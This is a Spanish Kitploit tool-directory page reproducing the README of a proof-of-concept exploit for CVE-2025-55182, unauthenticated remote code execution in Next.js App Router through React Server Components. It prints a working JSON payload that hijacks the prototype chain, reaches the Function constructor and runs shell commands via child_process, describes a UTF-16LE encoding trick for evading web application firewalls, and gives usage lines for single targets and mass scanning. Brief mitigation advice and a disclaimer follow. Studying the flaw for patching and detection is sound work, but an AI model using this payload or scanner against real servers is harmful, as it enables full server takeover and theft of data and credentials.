Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Exploit de prueba de concepto para CVE-2025-55182, que demuestra RCE no autenticado en Next.js App Router mediante inyección de objetos del lado del servidor en React Server Components, con bypass de WAF UTF-16LE. | Kitploit
Herramientas/GitHubGitHub/ceh-aditya-raj/cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHub
ceh-aditya-raj/cve-2025-55182

CVE-2025-55182

Exploit de prueba de concepto para CVE-2025-55182, que demuestra RCE no autenticado en Next.js App Router mediante inyección de objetos del lado del servidor en React Server Components, con bypass de WAF UTF-16LE.

Ver Repositorio
26hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 NextRce — CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce es una herramienta de investigación de seguridad que demuestra CVE-2025-55182, una vulnerabilidad crítica en aplicaciones Next.js App Router que utilizan React Server Components (RSC) y Server Actions.

Esta vulnerabilidad permite a un atacante lograr Ejecución Remota de Código (RCE) sin autenticación abusando de cómo Next.js procesa las respuestas de Server Actions y resuelve cargas útiles RSC serializadas en el servidor.


🛠 Resumen de la Vulnerabilidad

CVE-2025-55182 existe en la arquitectura Next.js App Router y puede clasificarse como un problema de inyección de objetos del lado del servidor / abuso de la cadena de prototipos que ocurre durante el manejo de solicitudes multipart/form-data.

Cuando se activa una Server Action, el servidor Next.js confía y deserializa la entrada estructurada del cliente. Al enviar una carga útil especialmente diseñada, un atacante puede manipular la lógica de resolución interna y ejecutar comandos arbitrarios del sistema en el runtime de Node.js.


📌 Causa Raíz

La vulnerabilidad surge debido a los siguientes factores combinados:

  • Modelo de Confianza de Server Actions
    Las Server Actions aceptan cargas útiles estructuradas del cliente que se procesan a través de la lógica de resolución interna de React Server Component con validación insuficiente.

  • Inyección de Objetos Durante la Resolución de RSC
    Las cargas útiles diseñadas pueden abusar de las cadenas de prototipos y referencias de constructores de JavaScript, permitiendo escapar del ámbito de objeto previsto.

  • Sanitización Insuficiente
    Campos internos como then, _response y los getters de form-data no están adecuadamente protegidos contra manipulación maliciosa.

  • Bypass de WAF Basado en Codificación
    Muchos Firewalls de Aplicaciones Web se centran en UTF-8 o JSON estándar. Codificar las cargas útiles como UTF-16LE les permite eludir la inspección mientras el servidor Next.js las decodifica correctamente.


  • 🔬 Análisis de la Carga Útil

    El exploit se basa en inyectar una carga útil RSC diseñada dentro de una solicitud multipart.
    A continuación se muestra una versión simplificada de la carga útil:

    root@kitploit:~
    {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"
        }
      }
    }
    

    🧠 Desglose del Exploit

    1. Secuestro de la Cadena de Prototipos

    • "then": "$1:__proto__:then"
    • Esto abusa de la cadena de prototipos de JavaScript al sobrescribir la propiedad then, interfiriendo en cómo se resuelven las Promesas durante el procesamiento de React Server Component en el runtime de Next.js.

    2. Escape del Constructor

    • "_formData": { "get": "$1:constructor:constructor" }
    • Esto permite el acceso al constructor global Function, habilitando la ejecución de JavaScript arbitrario fuera del sandbox previsto.

    3. Ejecución Remota de Código

    • process.mainModule .require('child_process') .execSync('{cmd}')
    • Accede a módulos internos de Node.js
    • Ejecuta comandos arbitrarios del sistema operativo de forma síncrona
    • Se ejecuta con los mismos privilegios que el proceso del servidor Next.js

    4. Exfiltración de Salida Basada en Digest

    • throw Object.assign(new Error('x'), { digest: res });
    • Next.js suprime mensajes de error detallados a menos que esté presente un campo digest.
    • Al adjuntar la salida del comando codificada en Base64 a la propiedad digest, el servidor devuelve involuntariamente los resultados de la ejecución en la respuesta HTTP.

    5. Bypass de WAF (UTF-16LE)

    • La carga útil se puede codificar como UTF-16LE y enviarse como:
    • Content-Type: text/plain; charset=utf-16le
    • Muchos motores WAF no logran decodificar e inspeccionar contenido UTF-16LE, mientras que el servidor Next.js lo decodifica y procesa correctamente, aumentando la fiabilidad de la explotación.

    💥 Impacto

    La explotación exitosa de CVE-2025-55182 puede resultar en:

    • 🔥 Ejecución Remota de Código Completa

    • 🗄️ Acceso a datos sensibles y credenciales

    • 🔗 Movimiento lateral dentro de la infraestructura

    • 📦 Compromiso de la cadena de suministro

    • 🚨 Toma completa del servidor

    • Severidad: Crítica

    • Autenticación requerida: No

    🛡 Mitigación

    Para protegerse contra CVE-2025-55182:

    • Actualice Next.js a una versión parcheada inmediatamente
    • Deshabilite las Server Actions no utilizadas
    • Aplique una validación estricta de las solicitudes multipart/form-data
    • Agregue reglas de WAF para detectar cargas útiles codificadas en UTF-16LE
    • Monitoree cabeceras Next-Action anormales y patrones de solicitud

    🚀 Uso

    Objetivo Único

    • python3 exploit.py -u https://target.com -c "whoami"

    Escaneo Masivo con Bypass de WAF

    • python3 exploit.py -l urls.txt -B -t 50

    ⚠️ Descargo de Responsabilidad

    • Este proyecto se proporciona estrictamente con fines educativos, de investigación y de pruebas de seguridad autorizadas.

    • NO utilice esta herramienta contra sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas.

    • El autor no asume ninguna responsabilidad por el uso indebido.

    Descargar herramienta